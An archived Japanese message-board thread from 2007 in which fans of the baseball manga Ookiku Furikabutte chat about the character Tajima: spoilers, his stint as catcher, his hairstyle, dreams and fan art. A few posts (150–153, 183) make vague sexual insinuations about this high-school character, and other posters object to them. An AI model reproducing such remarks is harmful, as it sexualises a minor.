お互い横になってる状態だったらそれ程重さを感じなかったりもするw

ただ睡眠中にやられたら体痺れそうだし、さぞ寝苦しいだろうなあw
花井カワイソスw
ファン的にはヘソ出し田島が見れて満足なシーンであった

138 :名無しかわいいよ名無し:2007/11/21(水) 20:44:14 ID:Anuzx7oK
たじぐるみ…名前カワユスw
田島は寝る時も食べる時も幸せそうな顔するよなあ
側にいたらつられてこっちまで笑顔になりそうだ

139 :名無しかわいいよ名無し:2007/11/22(木) 01:54:20 ID:IN2e8rie
猫が乗っかってても悪夢見るんだから、自分より大分軽いとはいえ
人間半分乗ってたら苦しそうだw

ところで早売りゲットした人もういるんだな
自分は買えるの多分24日かな…あとちょっとが待ち遠しいよ

140 :名無しかわいいよ名無し:2007/11/22(木) 17:29:22 ID:GZIzA9mp
ウサギって淋しいと死んじゃうらしいけど、なんか田島に似てる気がする

野菜好きだし、性欲旺盛だし

141 :名無しかわいいよ名無し:2007/11/22(木) 19:17:40 ID:SjXqTs3S
今日、田島と二人で車旅する夢見た(俺が兄だった)
車の中で寝泊まりして、海や山で食料調達して、気の向くまま車を走らせ、温泉で仲良く洗いっこ
寝るときは運転席と助手席を倒して、必ず寝る前に指切りみたいなことして、田島が
「にぃちゃんおやすみな★また明日も楽しい日でありますよーに。ドカン!」
と言って毛布被って数秒後にはイビキかいてる
それを見てから寝て・・・・


幸せすぎて、目覚めた時に夢が終わったことが悲しかった

142 :名無しかわいいよ名無し:2007/11/22(木) 20:32:14 ID:wJAzsa5M
超今さらなんだけど「続きをおさらいすっぞ」って変じゃね?
ラストから2ページ目

143 :名無しかわいいよ名無し:2007/11/22(木) 21:45:45 ID:AWGfMfp/
>>142
うーんと、田島と三橋は7回の裏で、ベンチの中で阿部に各打者の配球を教わってるんだよね
19P目で「防具着けながら もう1回 配球メモ見て…」って田島のモノローグ入ってるから
おそらく一通りは目を通したんだと思うんだ

で、8回の表で美丞は打者が8番まで回ったから、きっちり覚えきれてない
8番打者以降の「続きをおさらいする」って言ったんじゃないかな?

144 :名無しかわいいよ名無し:2007/11/22(木) 21:51:22 ID:AWGfMfp/
>>141
ところで田島の夢うらやましいな!田島が出てくる夢なんて今まで見た事ないよ
田島みたいなげんきっこな弟欲しい…いや、別に自分の弟に不満がある訳ではないがw
田島が弟だったらきっと、わくわく出来そうだ。試合の応援に熱心に通いそう
そういや、田島家は母以外試合に来てないね…興味ないのかな
連レスすまん

145 :名無しかわいいよ名無し:2007/11/22(木) 22:20:33 ID:1wN6/DJu
興味ないってことはないと思うけど、年寄りに長時間炎天下無理だし、兄ちゃんや姉ちゃんは仕事とかいろいろあるだろうからなかなか応援来れないのかも。

決勝まで行ったら一家(ジジババはテレビ)で来るかもね。
一家どころか親戚総動員かも!?

146 :名無しかわいいよ名無し:2007/11/22(木) 22:25:11 ID:fToM9IFS
>>141
また明日も楽しい日でありますよーに。ドカン!」←に盛大に笑って
しまったwwwいや、気持ちわかるんだがwドカン!て何だwww

それにしても何と言う幸せMAXな夢なんだ…ウラヤマスー

147 :名無しかわいいよ名無し:2007/11/22(木) 22:49:31 ID:SjXqTs3S
>>144
>>146
幸せだったけど、あまりに幸せだと目覚めがつらいよ(´;ω;`)

148 :名無しかわいいよ名無し:2007/11/22(木) 23:11:55 ID:GZIzA9mp
>>141
それは羨ましいなぁ

俺なんか見た夢と言えば、病院みたいな建物の廊下っぽい所で、すれ違いざま
に肩がぶつかって一瞬だけ田島と目が合ったけど、何も言わずにスッと目を逸
らされて、何事も無く歩いて去っていったという切ないものしか見れてないよ



ところで、テレビでタジマタジマ言われるとなんか幸せな気分になる

但馬牛だけど

149 :名無しかわいいよ名無し:2007/11/23(金) 07:33:03 ID:Msv5h+Lo
>>141
ドカン!
に盛大に吹いたwww

(*`▽´)<ドカン!

150 :名無しかわいいよ名無し:2007/11/23(金) 16:19:26 ID:Wd1vU4sR
田島の夢を見られるだけで最高に幸せだと思う。うらやま・・

まあ自分の夢にもし本当に出てきたら田島になにしちゃうかわかんないけどww

151 :名無しかわいいよ名無し:2007/11/23(金) 17:00:48 ID:fHePN+/P
>>150
じゃれあい

イヤンな所を弄る

しばらくじゃれあいのまま

そのうち田島様に異変が

いただきます


こんな感じか?

152 :名無しかわいいよ名無し:2007/11/23(金) 17:23:08 ID:a1xHymdF
………

153 :名無しかわいいよ名無し:2007/11/24(土) 00:46:30 ID:KHmnQpds
>>151
>>150じゃないがいただきたい所だなwっうぇえうぇwwwっうぇうぇw

154 :名無しかわいいよ名無し:2007/11/24(土) 07:36:23 ID:YxEHkS5d
田島スレは最近変態が増えたな
どっから沸いてくるんだ

155 :名無しかわいいよ名無し:2007/11/24(土) 09:25:34 ID:ZLAXOzR+
変態妄想は該当スレでやって欲しい

156 :名無しかわいいよ名無し:2007/11/24(土) 10:19:12 ID:bF/BSdIz
アフタ読んだよ
やっぱ9回表こええええ
サインバレに誰か気付けるのかな

157 :名無しかわいいよ名無し:2007/11/24(土) 13:43:53 ID:ynVfxz+7
(*`▽´)<38449
(*゚◇゚)<(…フォーク、ないよ…)
(*`▽´)<クリーム
(*゚◇゚)<(…シュー、シュート…)
(*`▽´)<どすーんぼすーん
(*゚◇゚)<(…内側、の、下…)


(゚д゚;)<(???なんのサインだ??喋ってるのはフェイクか??)

158 :名無しかわいいよ名無し:2007/11/24(土) 14:00:48 ID:sgRmoH4h
>>157
かわいいバッテリーだ


…所で今月田島は何処へ?

159 :名無しかわいいよ名無し:2007/11/24(土) 14:53:05 ID:sgRmoH4h
ごめん…ちゃんと居たね。

160 :名無しかわいいよ名無し:2007/11/24(土) 14:58:47 ID:r9uUIF65
>>157
わけわからんwww
でもかわいい。けしからん

161 :名無しかわいいよ名無し:2007/11/24(土) 21:56:33 ID:7gwu5FOz
>>157
萌えたww

162 :名無しかわいいよ名無し:2007/11/25(日) 18:28:11 ID:rjmPpmpC
やべー
DVD7巻のジャケ絵めっちゃ可愛い
歯をむき出しにしてニヒッって笑ってるのがたまんないわマジで

163 :名無しかわいいよ名無し:2007/11/26(月) 01:09:14 ID:+2KLMhn3
今月はアフタばれ解禁後書き込みにくる人あんま居ないと思ったら
田島の登場が極端に少なかったからなんだな…
まあ先月や先々月まるきり登場ないキャラとか居たから、今月は我慢かー
田島か三橋早くおかしいって気付いてくれー!サインばれ怖いよー!!

ひぐちはなんでこうファンをドキドキさせるんだ…心臓に悪い…

164 :名無しかわいいよ名無し:2007/11/26(月) 01:17:32 ID:/1iH8VKw
柱にも書いてたけど胃が痛くなる展開だな。
次は捕手田島だー。かっこいいけど、ハラハラする。
でも捕手経験のある後輩入ってきたら、こういうのは今後見れんかもしれんな。

165 :名無しかわいいよ名無し:2007/11/26(月) 05:00:26 ID:+2KLMhn3
秋も春もあるし、捕手田島はまだ見れるんではないかと考えてた
阿部が完治したら捕手田島の登場は無くなるのかな…(´・ω・)

166 :名無しかわいいよ名無し:2007/11/26(月) 17:23:35 ID:havk2SeV
まあ出す必要はないよね…
練習試合ではやるだろうけど。今回の反省もあるし

167 :名無しかわいいよ名無し:2007/11/26(月) 17:36:59 ID:m2PV2gJO
田島の三塁という守備位置は、本人の意思(強い球飛んで来るからおもしろい)
もあるだろうけど、打席に集中する為に最も適した場所なのだなあと
今回の事で気付き、感心した次第。

しかし捕手田島はまたいつもと違った格好良さがあっていいよな
次は練習試合で良いので、沖や花井と組んでるとこ見たい。

168 :名無しかわいいよ名無し:2007/11/26(月) 19:46:08 ID:2SL1jeFc
田島捕手に関しては、今まできちんとやって来ていなかった所為で今回苦杯を
嘗めさせられているってところだから、この試合が終わったら今回の反省を踏まえて
次またこんな事がないように、練習に取り入れて行くんじゃないかな
今回は阿部だったけど、三橋が投げれない状況がないとは言い切れないし
投手の方も花井と沖を使えるように、またモモカンが気合い入れて行きそう

169 :名無しかわいいよ名無し:2007/11/27(火) 17:37:16 ID:S0PsLzUs
コミックス派の俺には断片的しかわからないけど、レス見てると田島がちゃん
と人間なんだなぁと思った

早く人間田島が見たいけど、原作者にはあまり無理してほしくないね

170 :名無しかわいいよ名無し:2007/11/27(火) 23:21:10 ID:XAYMUTrR
田島は野球スイッチ入ると色々なものがあふれてしまうがw
元々普通に人間なんだぜw
そーいう神なとことのギャップが凄い好きだ。

コミックス楽しみで仕方無い。読み倒すぞ
できれば崎玉終了までは一気に読みたい所だが…ひたすら待つわw

171 :名無しかわいいよ名無し:2007/11/28(水) 02:47:25 ID:cjXhk/hf
崎玉戦は後半の方がみどころ多いからなー
コミックスすげー楽しみだ
アニメも終わったし、またすぐ元の発刊ペースに戻って来るんじゃないかな?

172 :名無しかわいいよ名無し:2007/11/28(水) 09:53:03 ID:927w9YRw
とりあえず10巻が間を置かずにでてくれるといいよな
崎玉戦を通しで堪能したい

173 :名無しかわいいよ名無し:2007/11/28(水) 18:07:35 ID:waa/lE0n
9巻の始めの方は球技大会だね。
野球以外のスポーツも出来る田島は格好いい!(三橋は…ある意味凄いし笑える)

何組でも良いから西浦に入りたい…

174 :名無しかわいいよ名無し:2007/11/28(水) 22:33:56 ID:+6rhTUQX
単行本9巻のおかげで今年の年末はテンション高く過ごせそうだ。
あと1月にはアニメ23話が入ったDVD8巻出るんだな。しかも特典CDに下野出るみたいだし。うひょひょ。



175 :名無しかわいいよ名無し:2007/11/29(木) 04:33:23 ID:EXu03m4A


176 :名無しかわいいよ名無し:2007/11/29(木) 12:06:35 ID:cpf592VB
9巻が待ち遠しくてしょうがないよ

177 :名無しかわいいよ名無し:2007/11/29(木) 17:13:05 ID:wrCQmQtV
漫画の発売日をカレンダーに赤丸した自分がいる

178 :名無しかわいいよ名無し:2007/11/29(木) 20:31:11 ID:KVzxKqyM
12月あたまに発売だったらよかったんだけどなー
アフタもコミックもDVDも月末だから、楽しみが一遍に来る分
その時を待つ一ヶ月が長いよ…
やっぱゲーム買うかな…DS持ってないんだが

179 :名無しかわいいよ名無し:2007/11/29(木) 20:33:36 ID:KVzxKqyM
>>175
ところでこの★って泉スレから来たのかw
泉誕生日だから書き込みしようと思って行ったら、ここに★落ちてるって書き込みがw

180 :名無しかわいいよ名無し:2007/11/29(木) 21:33:49 ID:Xfu4oxMC
クリスマス特に予定ないんで
9巻もアフタもDVDも田島サンタからのプレゼントと思っとくよ
そんでDVD見ながらケーキ食うよ
スシもケンタも食うよ!

181 :名無しかわいいよ名無し:2007/11/29(木) 22:40:38 ID:53SeMgCC
(*゚◇゚)<スシ…ケンタ…ケーキ…う、うまそう!


(*`▽´)<クリスマスすげー楽しみだぜ!


(仝ω仝)<その前に期末だろ


(;゚◇゚)(;`▽´)<…はい… 

182 :名無しかわいいよ名無し:2007/11/29(木) 22:54:27 ID:1KhVLawj
阿部にちゃんと教えてもらえ田島

183 :名無しかわいいよ名無し:2007/11/30(金) 00:23:01 ID:SCQM4evq
田島って物理取ってるんだろか
確か花井が『生物は無理だ』とか言ってたから生物取ってるやつ自体はいるん
だろうけど、田島がもし物理だったら、なんか心配だ。物理って難しそうで

生物なら教えられるんだけどね。特に生殖のあたりをしっぽりと

184 :名無しかわいいよ名無し:2007/11/30(金) 01:20:27 ID:xzaPeW6k
物理もだけど、美術や書道や音楽の選択授業を何選択してるのか気になる
書道選択してたら先生大変そうだw

185 :名無しかわいいよ名無し:2007/11/30(金) 02:21:42 ID:vw5nO8E0
どの授業選んでも「田島くん真面目にやりなさい」っていわれてそう

186 :名無しかわいいよ名無し:2007/11/30(金) 02:51:28 ID:IA8JdGBy
>>183
うちは物理も生物も化学も文理関係なく必修だった

>>184
個人的には美術選択だといいなと思う
粘土でネオアームストロング(ryみたいなゴーカイなもの作ってほしいw

187 :名無しかわいいよ名無し:2007/11/30(金) 20:34:40 ID:Q0uL16Rn
最近キャラスレどこも人居ないね
まだ人大杉なのかな
捕手田島の可愛さについて語ろうぜ

188 :名無しかわいいよ名無し:2007/11/30(金) 20:48:45 ID:YjqF87bg
坊主がかわいい

189 :名無しかわいいよ名無し:2007/11/30(金) 20:54:16 ID:eb/LuPos
防具着けてると更にちっちゃく見える気がするのは何故なんだぜw

捕手田島のお陰で、キャッチャーマスクのチラリズム威力を知りますた。
試合中にも関わらず田島が慣れない事をやっている、という状況も
貴重だ。

あのモンチッチみたいな髪型は美丞終わったら治るんかな?
あれはあれで可愛いがw

190 :名無しかわいいよ名無し:2007/11/30(金) 21:55:42 ID:EIAyiTwS
モンチッチw

防具いいよね防具。たくましくなったようにも見える。

191 :名無しかわいいよ名無し:2007/11/30(金) 23:15:30 ID:a+sGrnrP
ひぐちはなだらかに全員を坊主にする予定です

192 :名無しかわいいよ名無し:2007/12/01(土) 00:01:09 ID:3cvFJ60h
なだらかにwww

>>187
なんか巣山のとこで酒盛りはじまってたぞ?

193 :名無しかわいいよ名無し:2007/12/01(土) 01:54:57 ID:wGHICM5p
なだらかに坊主ワロタw

自分も今のモンチッチは違和感感じながらも結構好きだ
防具着けてると犯罪的にかわいいよな
あの頑張ってる感じが大好きだ

194 :名無しかわいいよ名無し:2007/12/01(土) 03:07:07 ID:pyP8gn66
モンチッチ頭も似合ってるがw
田島の印象ってやっぱりギザギザ?頭なんだよなー
マジでこのままなだらか坊主になっていくんだろうかw

多分上下同色のユニが黒い防具で横分割される分、背が低く見える
んじゃないかな…?

195 :名無しかわいいよ名無し:2007/12/01(土) 09:33:39 ID:it0sEQto
しかし初期の絵見ると、柔らかそうな猫毛だなー
アニメの影響か、自分もギザギザ頭のイメージになってたが

196 :187:2007/12/01(土) 10:32:53 ID:JJCg1YEN
はよっす!今日はいい天気だけど寒いな!
そういえばアニメ放映当時、田島スレだったかアニメスレだったかで
田島の髪型がツンツンし過ぎて違和感あるって書き込みしてる人居たな
初期の原作田島は、確かに髪柔らかそうだよね

>>192
レス遅くてすまん。話振るだけ振って夜勤に行ってた
巣山スレはここ最近他スレが勢いない中でも書き込み多いから
専ブラ入れてる人多いのかなって事を、スレ住人が昨日だか一昨日だかに話してたな
盛り上がってて書き込む人も多いから、あそこが抜きん出て勢いあるように見えるんだろう
酒飲みが多いスレってのも面白いwここはあんまり酒飲みいなさそう…かな

197 :名無しかわいいよ名無し:2007/12/01(土) 20:24:00 ID:41dbHMWV
このスレはなぜか下ネタがいやらしく感じられない

198 :名無しかわいいよ名無し:2007/12/01(土) 20:56:24 ID:C5FtzxFz
そりゃあだってここが18禁の板なら間違いなくオナ〇ーがスレタイになって
そうなキャラですもん

199 :名無しかわいいよ名無し:2007/12/01(土) 22:29:16 ID:YqTyRr55
>>198
なつかしいな、アニメキャラ板でかつて
そんなスレタイもありました(遠い目)

200 :名無しかわいいよ名無し:2007/12/01(土) 22:31:02 ID:r5VIPstc
オナニー系のコピペ改変とか結構貼られてたような気がするw

201 :名無しかわいいよ名無し:2007/12/02(日) 08:30:52 ID:ILM7IDX8
>>199の書き込みを見て、アニキャラスレのログ見てて初めて気付いたんだが
アニキャラスレの方がマンガキャラスレよりも先に立ってたんだな
そういえば自分もアニキャラの方のスレが落ちてから、漫画キャラ板にスレが
あるって事を知ってここを探し出したんだった


202 :名無しかわいいよ名無し:2007/12/02(日) 13:57:44 ID:Dtz0ENCv
このスレって男いる?不安なんだが

203 :名無しかわいいよ名無し:2007/12/02(日) 14:09:38 ID:DjJqH4uA
>>202
ノシ
女かと勘違いされるほどに田島様が大好きな俺がいますよ

204 :名無しかわいいよ名無し:2007/12/02(日) 14:15:03 ID:sr5DArw5
>>202
ノシ
男だぜゲンミツに!w

205 :名無しかわいいよ名無し:2007/12/02(日) 15:43:05 ID:PY1FQPSy
>>202
こういう場所だと不安になるよなw

何でか田島好きは男多いと思い込んでたけど、
実際はそんな事ないんかな?

206 :名無しかわいいよ名無し:2007/12/02(日) 15:50:16 ID:DjJqH4uA
田島は性別問わず誰にでも好かれる性格だと思う
男にも女にも可愛がられそう

207 :名無しかわいいよ名無し:2007/12/02(日) 19:50:50 ID:rXEbr4By
9巻まであと3週間切った!

208 :名無しかわいいよ名無し:2007/12/02(日) 21:08:41 ID:ILM7IDX8
このスレは男比率けっこうありそうな気がしてた…
前に田島の兄になった夢を見た人の書き込みあったよね

209 :名無しかわいいよ名無し:2007/12/02(日) 23:34:47 ID:n9fNr4JK
ちょっと話が前にもどるが
もしアニメ二期があったらと想像し、モンチッチ.ver作ってみた。
ttp://pai.no.land.to/up/src/dgz1312.gif

210 :名無しかわいいよ名無し:2007/12/03(月) 01:31:10 ID:9aOBdG7d
>>202
ノシ 田島となら結婚したいよ、英国あたりで


>>209
ちょwwめっさ可愛いww

211 :名無しかわいいよ名無し:2007/12/03(月) 01:53:14 ID:SAsbhh/2
>>209
おお、モンチッチバージョンの田島も可愛いなwGJ!

212 :203:2007/12/03(月) 05:15:47 ID:iB4KCreO
>>208
それ俺ノシ
覚えててくれてありがとう


>>209
なんというGJ!!www
携帯の待ち受けにしますw

213 :名無しかわいいよ名無し:2007/12/03(月) 06:02:29 ID:LVsgDgdQ
モンチッチGJwwwかわええなw
アニメ画で見るとそれ程違和感ない。原作で先に見てるせいだろうか
でも今でも原作モンチッチは少し違和感なんだよなーw

214 :名無しかわいいよ名無し:2007/12/03(月) 20:13:30 ID:w1WSAmHH
>>209
田島かわいいよ田島
アニメ二期があったら髪型はこんな感じなんだろうか
つかモンチッチという形容詞が定着しててワロタw

215 :202:2007/12/03(月) 23:12:02 ID:Xm1hEFCy
>>203
田島のかっこよさは異常だから男女関係ないよなー

>>204
( ´∀`)人(´∀` )ナカーマ

>>210
わかるwwwwかっこよすぎる


同じクラスに田島みたいなのいないかなー
花井みたいなのがいるから勝手に花井と呼ばせてもらってる野球部キャプならいるのに
花井も好きだけどwwww

216 :名無しかわいいよ名無し:2007/12/04(火) 05:13:08 ID:afEnb4ur
今のあの髪型をどう形容していいのか判らんくて
思わずモンチッチ言ってしまったが、皆に怒られなくてよかったw
しかも>>209GJ

9巻発売まであと一息!
まだ二週間以上あるのに、楽しみ過ぎて狂いそうだwww

217 :名無しかわいいよ名無し:2007/12/04(火) 10:31:45 ID:sOWhrLul
>>216
自分もモンチッチっぽいと思ってたから
多分他の人もイメージと呼び方にずれがなかったんではないかと

>>209の画像携帯のサブディスプレイに設定したw

218 :名無しかわいいよ名無し:2007/12/04(火) 17:15:29 ID:G9tFsKel
関係ないけどさっきテレビでチンパンジーが瞬間視やってて
田島級だったから吹いたw

53 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)